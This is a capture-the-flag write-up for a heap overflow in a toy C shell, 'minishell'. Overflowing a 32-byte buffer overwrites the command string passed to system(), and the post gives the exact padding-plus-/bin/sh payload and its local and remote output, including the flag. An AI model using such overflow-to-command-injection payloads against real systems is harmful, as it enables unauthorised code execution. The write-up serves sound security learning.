IMPORTANT: You can also find this WU (and others), with the source code on my GitHub
Basics
First of all we don’t have binaries associated with the challenge so I add to compile them:
gcc log.c -o log
gcc minishell.c -lcrypto -o minishell
Once this is done we can start reading the source code!
Note:
Contrary to what I’m used to say and do, here there is no need to inspect the binary withfile
,checksec
,strings
,ldd
,ltrace
andstrace
because we compiled it ourself!
We can not ensure that it has been compiled the same way in remote, still, it can be useful to experiment a bit.
Source code inspection
Please find the source code on my GitHub
So let’s read the code!
log.c
is really simple, just a main
function, it’s a logging tool, it will write its arguments passed in command line to a log file, that’s all.
minishell.c
is really something else: 269 lines of code.
When reading C
code I always start looking globally at the function names and then I deep into the main
function first.
Here it helped a lot, in main
we quickly note that there is a bunch of variables initialization, some memory allocation and then a while(1)
!
This is the infinite loop allowing the shell to always wait for user instructions.
We understand that the user is prompted for a string, which is then verified (some characters are forbidden in commandAllowed
maybe there is something here) and parsed with strtok
.
Then a bunch of if else
identify which function to execute given the user command. At that point I could have started looking into each and every function to look for vulnerabilities, but I didn’t.
I wanted to first finish the reading of main
and I chose really well.
So we continue reading main
to the last else
(in case the command doesn’t match any predefined strings), and there we have some really interesting stuff!
}else {
char *log = malloc(256 * sizeof(char));
strcpy(log, "./log Error with command:");
strcpy(arg, cmd);
strcat(log, arg);
system(log);
printf("Unknow command, this event has been reported\n");
}
Some strcpy
, a strcat
and above all a system
call!
Of course it instantly caught my eye: if we were able to control the log
variable, we could inject some commands here.
Unfortunately a predefined string is written in log
and even if we control cmd
it is just appended to ./log Error with command:
(remember ./log
is the second binary compiled at the beginning) by strcat
and because special characters like ;
or &&
are forbidden we cannot inject a 2nd command to log
๐ข
Note:
However I noticed first that at the beginning of thewhile
loopbuffer
is copied intocmd
before verifying it withcommandAllowed
.
So I tested an exploit where I injected some forbidden commandaa; /bin/sh
which won’t be executed but will be written incmd
anyway.
And then I inject a second onea
which is allowed but unrecognized: the idea was that it didn’t totally overwritecmd
which then would be something likea\n; /bin/sh
and be appended tolog
then executed.
Unfortunately,strcpy
(or other reason) adds a\x00
between the “new” injectiona
and the “remaining” one incmd
, so it ends the string and even if the payload is there in the stack it isn’t copied inlog
and wouldn’t have been executed bysystem
anyway.
So close!
So the real vulnerability is still here lying under our eyes: simply arg
is not the same size as cmd
, then when copying a long cmd
into arg
it overflows.
char* buffer = malloc(256 * sizeof(char));
char* cmd = malloc(256 * sizeof(char));
char *arg = malloc(32 * sizeof(char));
Because arg
is in the heap the question is then: what do we overflow?
And the answer is “if it’s the first prompt, probably log
which is alloc’d after arg
”, and finally we control log
!!!
Exploitation
Now arg
is 32 bytes long, and because we’re in the heap we will first overwrite the chunk header before overwriting log
’s content.
To determine exactly the padding needed for our payload, either we know the heap chunk header size, or we use gdb
(which is often really useful) but even simpler: a smart payload such as: AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG
(generated with a for
loop in python to avoid silly mistakes…) will easily do the job.
We inject it and see:
$ ./minishell
spaceshell> AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG
sh: line 1: GGGGGGGG: command not found
sh: line 2: AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG: command not found
sh: line 3: AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDE: command not found
Unknow command, this event has been reported
spaceshell>
Victory! GGGGGGGG
is executed as a command (I confirmed it with ltrace ./minishell
and saw the execution of system
with our payload and the result).
We then infer that an heap chunk header was 16 bytes long because our payload padding is AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF
which is 48 bytes, minus the 32 of arg
we get 16 bytes for the header.
The final payload is of course: AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF/bin/sh
and like that we get our shell ๐
Locally:
$ ./minishell
spaceshell> AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF/bin/sh
sh-5.2$ whoami
ctmbl
Remotely (I could have used /bin/sh
too of course):
$ nc 20.19.241.70 3001
spaceshell> AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFcat /home/ctf/flag.txt
THCON{G00d_0ld_0v3rfl0w}Unknow command, this event has been reported
๐๐๐๐
A good old overflow for sure ๐, but a good reminder and a nice introduction to heap overflow overall ๐
Conclusion
To sum up, here are the main step of the reasoning while tackling this challenge (and maybe how to tackle other pwn
challenges):
- First: what have I got? what do I want to achieve?
source code, no binaries, a remote access to the executing binary -> we want a shell on the remote machine - Here we got source code but no binary, we skip the inspect part and just compile the source code as we can.
We’ll have to assume the possible protection of the remote binary.Note that these two first parts are often forgotten but they are basically driving the rest of the exploit…
- Dive into the source code, take a global look at the code but quickly focus on main.
We do not try to understand everything or every line, just identify the structure of the code and potentialy flawed lines: arrays,malloc
andfree
,printf
, bounds offor
loops, Time of Check Time of Use (TOCTOU)… - We do not take a look at other functions while we have not finish reading main
- Get a first idea, try it, understand why it works, or why it doesn’t
- Find a possible exploitable bug (here a buffer overflow), confirm it by several means (direct execution and with
ltrace
in my case) and rigorously define the needed payload (in my case the size of the padding) - Exploit, flag, celebrate 🎉
Resources
If any doubts you can always contact me on Discord
ctmbl
or issue on my GitHub if you need more information or resources ๐
Links:
- what is a buffer overflow: https://en.wikipedia.org/wiki/Buffer_overflow#Example
- more about heap structure and exploitation: https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_chunk
strcpy
: https://man7.org/linux/man-pages/man3/strcpy.3.htmlstrcat
: https://linux.die.net/man/3/strcatstrtok
: https://man7.org/linux/man-pages/man3/strtok.3.htmlsystem
: https://man7.org/linux/man-pages/man3/system.3.html